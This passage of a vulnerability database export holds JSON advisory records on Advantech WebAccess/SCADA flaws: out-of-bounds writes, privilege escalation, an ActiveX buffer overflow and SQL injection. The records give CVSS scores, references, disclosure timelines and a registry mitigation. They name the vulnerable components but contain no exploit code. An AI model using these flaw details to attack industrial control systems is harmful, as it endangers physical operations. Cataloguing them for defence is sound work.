"LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2019-10987", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "REQUIRED", "vectorString": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10987", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-10987", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-10987", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2019-10987", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "CVE-2019-10987", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2019-32471", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201906-1076", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-142588", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "VULHUB", "id": "VHN-142588" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "CNNVD", "id": "CNNVD-201906-1076" }, { "db": "NVD", "id": "CVE-2019-10987" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple out-of-bounds write vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. WebAccess/SCADA Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwdraw.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities:\n1. A directory-traversal vulnerability\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. Multiple heap-based buffer-overflow vulnerabilities\n4. An information disclosure vulnerability\n5. Multiple remote-code execution vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (\u00e2??../\u00e2??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. \nAdvantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. The vulnerability stems from the fact that the program does not correctly verify the length of the data provided by the user", "sources": [ { "db": "NVD", "id": "CVE-2019-10987" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "BID", "id": "108923" }, { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "VULHUB", "id": "VHN-142588" } ], "trust": 3.96 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-10987", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-19-178-05", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-19-584", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-587", "trust": 2.4 }, { "db": "BID", "id": "108923", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201906-1076", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32471", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005815", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7438", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7952", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2350", "trust": 0.6 }, { "db": "IVD", "id": "2AED5DF4-3281-48D2-B87E-B8691B4A4884", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-142588", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "VULHUB", "id": "VHN-142588" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "CNNVD", "id": "CNNVD-201906-1076" }, { "db": "NVD", "id": "CVE-2019-10987" } ] }, "id": "VAR-201906-1026", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "VULHUB", "id": "VHN-142588" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "CNVD", "id": "CNVD-2019-32471" } ] }, "last_update_date": "2024-11-23T21:52:09.553000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech WebAccess/SCADA patch for out-of-bounds write vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181491" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=94179" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "CNNVD", "id": "CNNVD-201906-1076" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-142588" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "NVD", "id": "CVE-2019-10987" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 4.2, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "trust": 2.3, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-587/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-584/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10987" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/108923" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10987" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2350/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "VULHUB", "id": "VHN-142588" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "CNNVD", "id": "CNNVD-201906-1076" }, { "db": "NVD", "id": "CVE-2019-10987" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "VULHUB", "id": "VHN-142588" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "CNNVD", "id": "CNNVD-201906-1076" }, { "db": "NVD", "id": "CVE-2019-10987" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-584" }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-587" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32471" }, { "date": "2019-06-28T00:00:00", "db": "VULHUB", "id": "VHN-142588" }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923" }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "date": "2019-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1076" }, { "date": "2019-06-28T21:15:11.180000", "db": "NVD", "id": "CVE-2019-10987" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-584" }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-587" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32471" }, { "date": "2023-03-02T00:00:00", "db": "VULHUB", "id": "VHN-142588" }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923" }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "date": "2019-07-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1076" }, { "date": "2024-11-21T04:20:18.040000", "db": "NVD", "id": "CVE-2019-10987" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1076" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WebAccess/SCADA Vulnerable to out-of-bounds writing", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005815" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "CNNVD", "id": "CNNVD-201906-1076" } ], "trust": 0.8 } }
var-201903-1775
Vulnerability from variot
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens existing access control restrictions of current system files, then sets weak access control restrictions on new files. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201903-1775", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-257" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-257" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "ZDI-19-257", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-19-257", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-257" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows local attackers to escalate privileges on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens existing access control restrictions of current system files, then sets weak access control restrictions on new files. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-19-257" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-7411", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-257", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-257" } ] }, "id": "VAR-201903-1775", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:52:31.485000Z", "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-19-257" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-03-07T00:00:00", "db": "ZDI", "id": "ZDI-19-257" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-05-30T00:00:00", "db": "ZDI", "id": "ZDI-19-257" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess Node Product Installation File Access Control Modification Privilege Escalation Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-257" } ], "trust": 0.7 } }
var-201708-1699
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-556", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-556", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4106", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-556", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ] }, "id": "VAR-201708-1699", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:09:45.585000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-556", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-556", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-556", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaURL Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-556" } ], "trust": 0.7 } }
var-201202-0342
Vulnerability from variot
SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to execute arbitrary SQL commands via a malformed URL. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0234. BroadWin SCADA WebAccess is a web browser-based HMI and SCADA software for industrial control systems and automation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0342", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "advantech/broadwin", "scope": "eq", "trust": 0.6, "vendor": "webaccess", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "CNNVD", "id": "CNNVD-201202-421" }, { "db": "NVD", "id": "CVE-2012-1234" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001563" } ] }, "cve": "CVE-2012-1234", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2012-1234", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CNVD-2012-9018", "impactScore": 9.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:C/I:P/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "7d787100-463f-11e9-b84d-000c29342cb1", "impactScore": 9.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:C/I:P/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "1a20d46e-2354-11e6-abef-000c29c66e3d", "impactScore": 9.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:C/I:P/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", 